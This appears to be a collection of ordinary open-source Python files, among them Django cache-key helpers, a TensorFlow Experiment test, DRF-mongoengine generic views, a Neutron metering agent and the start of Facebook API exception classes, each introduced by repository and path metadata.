response['Expires'] = http_date(time.time() + cache_timeout)
patch_cache_control(response, max_age=cache_timeout)
def add_never_cache_headers(response):
"""
Adds headers to a response to indicate that a page should never be cached.
"""
patch_response_headers(response, cache_timeout=-1)
def patch_vary_headers(response, newheaders):
"""
Adds (or updates) the "Vary" header in the given HttpResponse object.
newheaders is a list of header names that should be in "Vary". Existing
headers in "Vary" aren't removed.
"""
# Note that we need to keep the original order intact, because cache
# implementations may rely on the order of the Vary contents in, say,
# computing an MD5 hash.
if response.has_header('Vary'):
vary_headers = cc_delim_re.split(response['Vary'])
else:
vary_headers = []
# Use .lower() here so we treat headers as case-insensitive.
existing_headers = set([header.lower() for header in vary_headers])
additional_headers = [newheader for newheader in newheaders
if newheader.lower() not in existing_headers]
response['Vary'] = ', '.join(vary_headers + additional_headers)
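# Illustrative usage sketch (added for clarity; not part of the original
# module). As the module docstring notes, an i18n-aware view would add
# "Accept-Language" to Vary so caches key on it; patch_vary_headers() keeps
# existing entries and skips duplicates case-insensitively.
def _example_patch_vary_headers():
    from django.http import HttpResponse
    response = HttpResponse()
    response['Vary'] = 'Cookie'
    patch_vary_headers(response, ['accept-language', 'Cookie'])
    # Existing entries keep their order and "Cookie" is not repeated:
    # response['Vary'] == 'Cookie, accept-language'
    return response['Vary']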
def has_vary_header(response, header_query):
"""
Checks to see if the response has a given header name in its Vary header.
"""
if not response.has_header('Vary'):
return False
vary_headers = cc_delim_re.split(response['Vary'])
existing_headers = set([header.lower() for header in vary_headers])
return header_query.lower() in existing_headers
def _i18n_cache_key_suffix(request, cache_key):
"""If enabled, returns the cache key ending with a locale."""
if settings.USE_I18N:
# first check if LocaleMiddleware or another middleware added
# LANGUAGE_CODE to request, then fall back to the active language
# which in turn can also fall back to settings.LANGUAGE_CODE
cache_key += '.%s' % getattr(request, 'LANGUAGE_CODE', get_language())
return cache_key
def _generate_cache_key(request, method, headerlist, key_prefix):
"""Returns a cache key from the headers given in the header list."""
ctx = md5_constructor()
for header in headerlist:
value = request.META.get(header, None)
if value is not None:
ctx.update(value)
path = md5_constructor(iri_to_uri(request.get_full_path()))
cache_key = 'views.decorators.cache.cache_page.%s.%s.%s.%s' % (
key_prefix, request.method, path.hexdigest(), ctx.hexdigest())
return _i18n_cache_key_suffix(request, cache_key)
def _generate_cache_header_key(key_prefix, request):
"""Returns a cache key for the header cache."""
path = md5_constructor(iri_to_uri(request.get_full_path()))
cache_key = 'views.decorators.cache.cache_header.%s.%s' % (
key_prefix, path.hexdigest())
return _i18n_cache_key_suffix(request, cache_key)
def get_cache_key(request, key_prefix=None, method='GET', cache=None):
"""
Returns a cache key based on the request path and query. It can be used
in the request phase because it pulls the list of headers to take into
account from the global path registry and uses those to build a cache key
to check against.
If there is no headerlist stored, the page needs to be rebuilt, so this
function returns None.
"""
if key_prefix is None:
key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
cache_key = _generate_cache_header_key(key_prefix, request)
if cache is None:
cache = get_cache(settings.CACHE_MIDDLEWARE_ALIAS)
headerlist = cache.get(cache_key, None)
if headerlist is not None:
return _generate_cache_key(request, method, headerlist, key_prefix)
else:
return None
def learn_cache_key(request, response, cache_timeout=None, key_prefix=None, cache=None):
"""
Learns what headers to take into account for some request path from the
response object. It stores those headers in a global path registry so that
later access to that path will know what headers to take into account
without building the response object itself. The headers are named in the
Vary header of the response, but we want to prevent response generation.
The list of headers to use for cache key generation is stored in the same
cache as the pages themselves. If the cache ages some data out of the
cache, this just means that we have to build the response once to get at
    the Vary header, and thus the list of headers to use for the cache key.
"""
if key_prefix is None:
key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
if cache_timeout is None:
cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
cache_key = _generate_cache_header_key(key_prefix, request)
if cache is None:
cache = get_cache(settings.CACHE_MIDDLEWARE_ALIAS)
if response.has_header('Vary'):
headerlist = ['HTTP_'+header.upper().replace('-', '_')
for header in cc_delim_re.split(response['Vary'])]
cache.set(cache_key, headerlist, cache_timeout)
return _generate_cache_key(request, request.method, headerlist, key_prefix)
else:
# if there is no Vary header, we still need a cache key
# for the request.get_full_path()
cache.set(cache_key, [], cache_timeout)
return _generate_cache_key(request, request.method, [], key_prefix)
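# Illustrative sketch of the two-phase flow described in the get_cache_key()
# and learn_cache_key() docstrings (added for clarity; not part of the
# original module). A cache-middleware-style caller would look roughly like
# this; `request` and `response` are assumed to be real HttpRequest and
# HttpResponse objects.
def _example_cache_key_flow(request, response):
    # Response phase: record which headers the response's Vary names for this
    # path and compute the key under which the page itself would be stored.
    page_key = learn_cache_key(request, response, cache_timeout=600)
    # Request phase (on a later hit): rebuild the key from the stored header
    # list; None means no response for this path has been seen yet.
    lookup_key = get_cache_key(request)
    return page_key, lookup_key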
def _to_tuple(s):
    t = s.split('=', 1)
if len(t) == 2:
return t[0].lower(), t[1]
return t[0].lower(), True
|
wweiradio/django
|
refs/heads/master
|
tests/foreign_object/__init__.py
|
12133432
| |
moritzpein/mong
|
refs/heads/master
|
mong/__init__.py
|
12133432
| |
JT5D/scikit-learn
|
refs/heads/master
|
sklearn/semi_supervised/tests/__init__.py
|
12133432
| |
joao-bjsoftware/django-avatar
|
refs/heads/master
|
avatar/management/commands/__init__.py
|
12133432
| |
jeffzheng1/tensorflow
|
refs/heads/master
|
tensorflow/contrib/learn/python/learn/experiment_test.py
|
16
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for TaskRunner and Experiment class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.python.util.all_util import reveal_undocumented
class TestEstimator(tf.contrib.learn.Evaluable, tf.contrib.learn.Trainable):
def __init__(self, config=None):
self.eval_count = 0
self.fit_count = 0
self.monitors = []
self._config = config or run_config.RunConfig()
@property
def config(self):
return self._config
def evaluate(self, **kwargs):
tf.logging.info('evaluate called with args: %s' % kwargs)
self.eval_count += 1
if self.eval_count > 5:
tf.logging.info('Ran 6 evals. Done.')
raise StopIteration()
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def fit(self, **kwargs):
tf.logging.info('fit called with args: %s' % kwargs)
self.fit_count += 1
if 'monitors' in kwargs:
self.monitors = kwargs['monitors']
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
class ExperimentTest(tf.test.TestCase):
def setUp(self):
# The official name is tf.train, so tf.training was obliterated.
reveal_undocumented('tensorflow.python.training')
def test_train(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
train_steps='train_steps',
eval_input_fn='eval_input',
eval_metrics='eval_metrics')
fit_args = ex.train(delay_secs=0)
self.assertEquals(1, est.fit_count)
self.assertIn(('max_steps', 'train_steps'), fit_args)
self.assertEquals(0, est.eval_count)
def test_train_delay(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
for delay in [0, 1, 3]:
start = time.time()
ex.train(delay_secs=delay)
duration = time.time() - start
self.assertAlmostEqual(duration, delay, delta=0.5)
def test_train_default_delay(self):
config = run_config.RunConfig()
est = TestEstimator(config)
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
for task in [0, 1, 3]:
start = time.time()
config.task = task
ex.train()
duration = time.time() - start
self.assertAlmostEqual(duration, task*5, delta=0.5)
@tf.test.mock.patch('tensorflow.python.training.server_lib.Server') # pylint: disable=line-too-long
def test_train_starts_server(self, mock_server):
# Arrange.
config = tf.contrib.learn.RunConfig(
master='host4:2222',
cluster_spec=tf.train.ClusterSpec(
{'ps': ['host1:2222', 'host2:2222'],
'worker': ['host3:2222', 'host4:2222', 'host5:2222']}
),
job_name='worker',
task=1,
num_cores=15,
gpu_memory_fraction=0.314,
)
est = TestEstimator(config)
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
# Act.
# We want to make sure we discount the time it takes to start the server
# in our accounting of the delay, so we set a small delay here.
start = time.time()
ex.train(delay_secs=1)
duration = time.time() - start
# Assert.
expected_config_proto = tf.ConfigProto()
expected_config_proto.inter_op_parallelism_threads = 15
expected_config_proto.intra_op_parallelism_threads = 15
expected_config_proto.gpu_options.per_process_gpu_memory_fraction = 0.314
mock_server.assert_called_with(
config.cluster_spec,
job_name='worker',
task_index=1,
config=expected_config_proto,
start=False)
mock_server.assert_has_calls([tf.test.mock.call().start()])
# Ensure that the delay takes into account the time to start the server.
self.assertAlmostEqual(duration, 1.0, delta=0.5)
@tf.test.mock.patch('tensorflow.python.training.server_lib.Server') # pylint: disable=line-too-long
def test_train_server_does_not_start_without_cluster_spec(self, mock_server):
config = tf.contrib.learn.RunConfig(master='host4:2222')
ex = tf.contrib.learn.Experiment(TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because there was no ClusterSpec.
self.assertFalse(mock_server.called)
@tf.test.mock.patch('tensorflow.python.training.server_lib.Server') # pylint: disable=line-too-long
def test_train_server_does_not_start_with_empty_master(self, mock_server):
config = tf.contrib.learn.RunConfig(
cluster_spec=tf.train.ClusterSpec(
{'ps': ['host1:2222', 'host2:2222'],
'worker': ['host3:2222', 'host4:2222', 'host5:2222']}
),
master='',)
ex = tf.contrib.learn.Experiment(TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because master was the empty string.
self.assertFalse(mock_server.called)
def test_train_raises_if_job_name_is_missing(self):
no_job_name = tf.contrib.learn.RunConfig(
cluster_spec=tf.train.ClusterSpec(
{'ps': ['host1:2222', 'host2:2222'],
'worker': ['host3:2222', 'host4:2222', 'host5:2222']},
),
task=1,
master='host3:2222', # Normally selected by job_name
)
with self.assertRaises(ValueError):
ex = tf.contrib.learn.Experiment(TestEstimator(no_job_name),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
def test_evaluate(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_steps='steps',
eval_delay_secs=0)
ex.evaluate()
self.assertEquals(1, est.eval_count)
self.assertEquals(0, est.fit_count)
def test_evaluate_delay(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
for delay in [0, 1, 3]:
start = time.time()
ex.evaluate(delay_secs=delay)
duration = time.time() - start
tf.logging.info('eval duration (expected %f): %f', delay, duration)
self.assertAlmostEqual(duration, delay, delta=0.5)
def test_continuous_eval(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
self.assertRaises(StopIteration, ex.continuous_eval)
self.assertEquals(6, est.eval_count)
self.assertEquals(0, est.fit_count)
def test_continuous_eval_throttle_delay(self):
for delay in [0, 1, 2]:
est = TestEstimator()
ex = tf.contrib.learn.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
continuous_eval_throttle_secs=delay,
eval_delay_secs=0)
start = time.time()
self.assertRaises(StopIteration, ex.continuous_eval)
duration = time.time() - start
expected = 5 * delay
tf.logging.info('eval duration (expected %f): %f', expected, duration)
self.assertAlmostEqual(duration, expected, delta=0.5)
def test_run_local(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
ex.local_run()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, len(est.monitors))
self.assertTrue(isinstance(est.monitors[0],
tf.contrib.learn.monitors.ValidationMonitor))
def test_train_and_evaluate(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_steps=100,
eval_steps=100)
ex.train_and_evaluate()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, len(est.monitors))
self.assertTrue(isinstance(est.monitors[0],
tf.contrib.learn.monitors.ValidationMonitor))
@tf.test.mock.patch('tensorflow.python.training.server_lib.Server') # pylint: disable=line-too-long
def test_run_std_server(self, mock_server):
# Arrange.
config = tf.contrib.learn.RunConfig(
master='host2:2222',
cluster_spec=tf.train.ClusterSpec(
{'ps': ['host1:2222', 'host2:2222'],
'worker': ['host3:2222', 'host4:2222', 'host5:2222']}
),
job_name='ps',
task=1,
num_cores=15,
gpu_memory_fraction=0.314,
)
est = TestEstimator(config)
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
# Act.
ex.run_std_server()
# Assert.
mock_server.assert_has_calls([tf.test.mock.call().start(),
tf.test.mock.call().join()])
@tf.test.mock.patch('tensorflow.python.training.server_lib.Server') # pylint: disable=line-too-long
def test_run_std_server_raises_without_cluster_spec(self, mock_server):
config = tf.contrib.learn.RunConfig(master='host4:2222')
with self.assertRaises(ValueError):
ex = tf.contrib.learn.Experiment(TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.run_std_server()
def test_test(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.test()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
if __name__ == '__main__':
tf.test.main()
|
vijayendrabvs/hap
|
refs/heads/master
|
neutron/plugins/mlnx/common/constants.py
|
11
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
LOCAL_VLAN_ID = -2
FLAT_VLAN_ID = -1
# Values for physical network_type
TYPE_IB = 'ib'
TYPE_ETH = 'eth'
VIF_TYPE_DIRECT = 'mlnx_direct'
VIF_TYPE_HOSTDEV = 'hostdev'
VNIC_TYPE = 'vnic_type'
|
pombredanne/django-rest-framework-mongoengine
|
refs/heads/master
|
rest_framework_mongoengine/generics.py
|
5
|
from rest_framework import mixins
from rest_framework import generics as drf_generics
from mongoengine.queryset.base import BaseQuerySet
from mongoengine.errors import ValidationError  # raised by QuerySet.get() on malformed ids; used in get_object()
class GenericAPIView(drf_generics.GenericAPIView):
"""
View to play nice with our Document Serializer
"""
lookup_field = 'id'
def get_queryset(self):
"""
        Re-evaluate the queryset, fixes #63
"""
queryset = super(GenericAPIView, self).get_queryset()
if isinstance(queryset, BaseQuerySet):
queryset = queryset.all()
return queryset
def get_object(self):
"""
*** Inherited from DRF 3 GenericAPIView, swapped get_object_or_404() with similar logic for mongoengine ***
Returns the object the view is displaying.
You may want to override this if you need to provide non-standard
queryset lookups. Eg if objects are referenced using multiple
keyword arguments in the url conf.
"""
queryset = self.filter_queryset(self.get_queryset())
# Perform the lookup filtering.
lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field
assert lookup_url_kwarg in self.kwargs, (
'Expected view %s to be called with a URL keyword argument '
'named "%s". Fix your URL conf, or set the `.lookup_field` '
'attribute on the view correctly.' %
(self.__class__.__name__, lookup_url_kwarg)
)
filter_kwargs = {self.lookup_field: self.kwargs[lookup_url_kwarg]}
try:
obj = queryset.get(**filter_kwargs)
except (queryset._document.DoesNotExist, ValidationError):
from django.http import Http404
raise Http404('No %s matches the given query.' % queryset._document._class_name)
# May raise a permission denied
self.check_object_permissions(self.request, obj)
return obj
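# Illustrative sketch of the override suggested in the get_object() docstring
# above (added for clarity; not part of the original module). The view and its
# `author`/`slug` keyword arguments are hypothetical: a URL conf capturing two
# keyword arguments instead of the single lookup_field.
class _ExampleTwoKeywordLookupView(GenericAPIView):
    def get_object(self):
        queryset = self.filter_queryset(self.get_queryset())
        obj = queryset.get(author=self.kwargs['author'],
                           slug=self.kwargs['slug'])
        self.check_object_permissions(self.request, obj)
        return obj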
class CreateAPIView(mixins.CreateModelMixin,
GenericAPIView):
"""
Concrete view for creating a model instance.
"""
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class ListAPIView(mixins.ListModelMixin,
GenericAPIView):
"""
Concrete view for listing a queryset.
"""
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class ListCreateAPIView(mixins.ListModelMixin,
mixins.CreateModelMixin,
GenericAPIView):
"""
Concrete view for listing a queryset or creating a model instance.
"""
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class RetrieveAPIView(mixins.RetrieveModelMixin,
GenericAPIView):
"""
Concrete view for retrieving a model instance.
"""
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class UpdateAPIView(mixins.UpdateModelMixin,
GenericAPIView):
"""
Concrete view for updating a model instance.
"""
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
class RetrieveUpdateAPIView(mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
GenericAPIView):
"""
Concrete view for retrieving, updating a model instance.
"""
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
class RetrieveDestroyAPIView(mixins.RetrieveModelMixin,
mixins.DestroyModelMixin,
GenericAPIView):
"""
Concrete view for retrieving or deleting a model instance.
"""
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
class RetrieveUpdateDestroyAPIView(mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
GenericAPIView):
"""
Concrete view for retrieving, updating or deleting a model instance.
"""
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
|
fnouama/intellij-community
|
refs/heads/master
|
python/testData/quickFixes/PyAddPropertyForFieldQuickFixTest/protectedMember_after.py
|
80
|
class A:
def __init__(self):
self._x = 1
def _foo(self):
print(self._x)
@property
def x(self):
return self._x
a = A()
a._foo()
print(a.x)
|
noelbk/neutron-juniper
|
refs/heads/master
|
neutron/services/metering/agents/metering_agent.py
|
13
|
# Copyright (C) 2013 eNovance SAS <licensing@enovance.com>
#
# Author: Sylvain Afchain <sylvain.afchain@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import eventlet
from oslo.config import cfg
from neutron.agent.common import config
from neutron.agent import rpc as agent_rpc
from neutron.common import constants as constants
from neutron.common import topics
from neutron.common import utils
from neutron import context
from neutron import manager
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import loopingcall
from neutron.openstack.common.notifier import api as notifier_api
from neutron.openstack.common import periodic_task
from neutron.openstack.common.rpc import proxy
from neutron.openstack.common import service
from neutron import service as neutron_service
LOG = logging.getLogger(__name__)
class MeteringPluginRpc(proxy.RpcProxy):
BASE_RPC_API_VERSION = '1.0'
def __init__(self, host):
super(MeteringPluginRpc,
self).__init__(topic=topics.METERING_AGENT,
default_version=self.BASE_RPC_API_VERSION)
def _get_sync_data_metering(self, context):
try:
return self.call(context,
self.make_msg('get_sync_data_metering',
host=self.host),
topic=topics.METERING_PLUGIN)
except Exception:
LOG.exception(_("Failed synchronizing routers"))
class MeteringAgent(MeteringPluginRpc, manager.Manager):
Opts = [
cfg.StrOpt('driver',
default='neutron.services.metering.drivers.noop.'
'noop_driver.NoopMeteringDriver',
help=_("Metering driver")),
cfg.IntOpt('measure_interval', default=30,
help=_("Interval between two metering measures")),
cfg.IntOpt('report_interval', default=300,
help=_("Interval between two metering reports")),
]
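    # Illustrative metering_agent.ini sketch for the options registered above
    # (added for clarity; not part of the original module). The driver shown is
    # the in-tree iptables driver; its import path may differ per release and
    # deployment:
    #
    #   [DEFAULT]
    #   driver = neutron.services.metering.drivers.iptables.iptables_driver.IptablesMeteringDriver
    #   measure_interval = 30
    #   report_interval = 300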
def __init__(self, host, conf=None):
self.conf = conf or cfg.CONF
self._load_drivers()
self.root_helper = config.get_root_helper(self.conf)
self.context = context.get_admin_context_without_session()
self.metering_info = {}
self.metering_loop = loopingcall.FixedIntervalLoopingCall(
self._metering_loop
)
measure_interval = self.conf.measure_interval
self.last_report = 0
self.metering_loop.start(interval=measure_interval)
self.host = host
self.label_tenant_id = {}
self.routers = {}
self.metering_infos = {}
super(MeteringAgent, self).__init__(host=self.conf.host)
def _load_drivers(self):
"""Loads plugin-driver from configuration."""
LOG.info(_("Loading Metering driver %s"), self.conf.driver)
if not self.conf.driver:
raise SystemExit(_('A metering driver must be specified'))
self.metering_driver = importutils.import_object(
self.conf.driver, self, self.conf)
def _metering_notification(self):
for label_id, info in self.metering_infos.items():
data = {'label_id': label_id,
'tenant_id': self.label_tenant_id.get(label_id),
'pkts': info['pkts'],
'bytes': info['bytes'],
'time': info['time'],
'first_update': info['first_update'],
'last_update': info['last_update'],
'host': self.host}
LOG.debug(_("Send metering report: %s"), data)
notifier_api.notify(self.context,
notifier_api.publisher_id('metering'),
'l3.meter',
notifier_api.CONF.default_notification_level,
data)
info['pkts'] = 0
info['bytes'] = 0
info['time'] = 0
    def _purge_metering_info(self):
        # Drop accumulated counters for labels that have not been updated for
        # at least one report interval.
        ts = int(time.time())
        report_interval = self.conf.report_interval
        for label_id, info in list(self.metering_infos.items()):
            if info['last_update'] < ts - report_interval:
                del self.metering_infos[label_id]
def _add_metering_info(self, label_id, pkts, bytes):
ts = int(time.time())
info = self.metering_infos.get(label_id, {'bytes': 0,
'pkts': 0,
'time': 0,
'first_update': ts,
'last_update': ts})
info['bytes'] += bytes
info['pkts'] += pkts
info['time'] += ts - info['last_update']
info['last_update'] = ts
self.metering_infos[label_id] = info
return info
def _add_metering_infos(self):
self.label_tenant_id = {}
for router in self.routers.values():
tenant_id = router['tenant_id']
labels = router.get(constants.METERING_LABEL_KEY, [])
for label in labels:
label_id = label['id']
self.label_tenant_id[label_id] = tenant_id
tenant_id = self.label_tenant_id.get
accs = self._get_traffic_counters(self.context, self.routers.values())
if not accs:
return
for label_id, acc in accs.items():
self._add_metering_info(label_id, acc['pkts'], acc['bytes'])
def _metering_loop(self):
self._add_metering_infos()
ts = int(time.time())
delta = ts - self.last_report
report_interval = self.conf.report_interval
if delta > report_interval:
self._metering_notification()
self._purge_metering_info()
self.last_report = ts
@utils.synchronized('metering-agent')
def _invoke_driver(self, context, meterings, func_name):
try:
return getattr(self.metering_driver, func_name)(context, meterings)
except AttributeError:
LOG.exception(_("Driver %(driver)s does not implement %(func)s"),
{'driver': self.conf.driver,
'func': func_name})
except RuntimeError:
LOG.exception(_("Driver %(driver)s:%(func)s runtime error"),
{'driver': self.conf.driver,
'func': func_name})
@periodic_task.periodic_task(run_immediately=True)
def _sync_routers_task(self, context):
routers = self._get_sync_data_metering(self.context)
if not routers:
return
self._update_routers(context, routers)
def router_deleted(self, context, router_id):
self._add_metering_infos()
if router_id in self.routers:
del self.routers[router_id]
return self._invoke_driver(context, router_id,
'remove_router')
def routers_updated(self, context, routers=None):
if not routers:
routers = self._get_sync_data_metering(self.context)
if not routers:
return
self._update_routers(context, routers)
def _update_routers(self, context, routers):
for router in routers:
self.routers[router['id']] = router
return self._invoke_driver(context, routers,
'update_routers')
def _get_traffic_counters(self, context, routers):
LOG.debug(_("Get router traffic counters"))
return self._invoke_driver(context, routers, 'get_traffic_counters')
def update_metering_label_rules(self, context, routers):
LOG.debug(_("Update metering rules from agent"))
return self._invoke_driver(context, routers,
'update_metering_label_rules')
def add_metering_label(self, context, routers):
LOG.debug(_("Creating a metering label from agent"))
return self._invoke_driver(context, routers,
'add_metering_label')
def remove_metering_label(self, context, routers):
self._add_metering_infos()
LOG.debug(_("Delete a metering label from agent"))
return self._invoke_driver(context, routers,
'remove_metering_label')
class MeteringAgentWithStateReport(MeteringAgent):
def __init__(self, host, conf=None):
super(MeteringAgentWithStateReport, self).__init__(host=host,
conf=conf)
self.state_rpc = agent_rpc.PluginReportStateAPI(topics.PLUGIN)
self.agent_state = {
'binary': 'neutron-metering-agent',
'host': host,
'topic': topics.METERING_AGENT,
'configurations': {
'metering_driver': self.conf.driver,
'measure_interval':
self.conf.measure_interval,
'report_interval': self.conf.report_interval
},
'start_flag': True,
'agent_type': constants.AGENT_TYPE_METERING}
report_interval = cfg.CONF.AGENT.report_interval
self.use_call = True
if report_interval:
self.heartbeat = loopingcall.FixedIntervalLoopingCall(
self._report_state)
self.heartbeat.start(interval=report_interval)
def _report_state(self):
try:
self.state_rpc.report_state(self.context, self.agent_state,
self.use_call)
self.agent_state.pop('start_flag', None)
self.use_call = False
except AttributeError:
# This means the server does not support report_state
LOG.warn(_("Neutron server does not support state report."
" State report for this agent will be disabled."))
self.heartbeat.stop()
return
except Exception:
LOG.exception(_("Failed reporting state!"))
def agent_updated(self, context, payload):
LOG.info(_("agent_updated by server side %s!"), payload)
def main():
eventlet.monkey_patch()
conf = cfg.CONF
conf.register_opts(MeteringAgent.Opts)
config.register_agent_state_opts_helper(conf)
config.register_root_helper(conf)
conf(project='neutron')
config.setup_logging(conf)
server = neutron_service.Service.create(
binary='neutron-metering-agent',
topic=topics.METERING_AGENT,
report_interval=cfg.CONF.AGENT.report_interval,
manager='neutron.services.metering.agents.'
'metering_agent.MeteringAgentWithStateReport')
service.launch(server).wait()
|
fire855/android_external_skia
|
refs/heads/cm-12.1-mt6592
|
gm/rebaseline_server/compare_to_expectations_test.py
|
68
|
#!/usr/bin/python
"""
Copyright 2013 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
Test compare_to_expectations.py
TODO(epoger): Create a command to update the expected results (in
self._output_dir_expected) when appropriate. For now, you should:
1. examine the results in self._output_dir_actual and make sure they are ok
2. rm -rf self._output_dir_expected
3. mv self._output_dir_actual self._output_dir_expected
Although, if you're using an SVN checkout, this will blow away .svn directories
within self._output_dir_expected, which wouldn't be good...
"""
import os
import sys
# Imports from within Skia
import base_unittest
import compare_to_expectations
import results
import gm_json # must import results first, so that gm_json will be in sys.path
class CompareToExpectationsTest(base_unittest.TestCase):
def test_gm(self):
"""Process results of a GM run with the ExpectationComparisons object."""
results_obj = compare_to_expectations.ExpectationComparisons(
actuals_root=os.path.join(self._input_dir, 'gm-actuals'),
expected_root=os.path.join(self._input_dir, 'gm-expectations'),
generated_images_root=self._temp_dir,
diff_base_url='/static/generated-images')
results_obj.get_timestamp = mock_get_timestamp
gm_json.WriteToFile(
results_obj.get_packaged_results_of_type(
results.KEY__HEADER__RESULTS_ALL),
os.path.join(self._output_dir_actual, 'gm.json'))
def mock_get_timestamp():
"""Mock version of BaseComparisons.get_timestamp() for testing."""
return 12345678
def main():
base_unittest.main(CompareToExpectationsTest)
if __name__ == '__main__':
main()
|
JPWKU/unix-agent
|
refs/heads/master
|
src/dcm/agent/__init__.py
|
3
|
#
# Copyright (C) 2014 Dell, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import pkg_resources
g_version = pkg_resources.require("dcm-agent")[0].version
g_protocol_version = 104
def get_root_location():
return os.path.abspath(os.path.dirname(__file__))
|
abendleiter/Django-facebook
|
refs/heads/master
|
open_facebook/exceptions.py
|
1
|
'''
Facebook error classes also see
http://fbdevwiki.com/wiki/Error_codes#User_Permission_Errors
'''
import ssl
try:
    # python 2 imports
    from urllib2 import HTTPError, URLError
except ImportError:
    # python 3 imports
    from urllib.error import HTTPError, URLError
class OpenFacebookException(Exception):
'''
BaseClass for all open facebook errors
'''
@classmethod
def codes_list(cls):
'''
        Returns the codes as a list
'''
if hasattr(cls, 'codes'):
codes_list = [cls.codes]
if isinstance(cls.codes, list):
codes_list = cls.codes
return codes_list
@classmethod
def range(cls):
'''
        Returns how many codes this Exception matches, with the eventual
        goal of matching an error to the most specific error class
'''
range = 0
codes_list = cls.codes_list()
for c in codes_list:
if isinstance(c, tuple):
start, stop = c
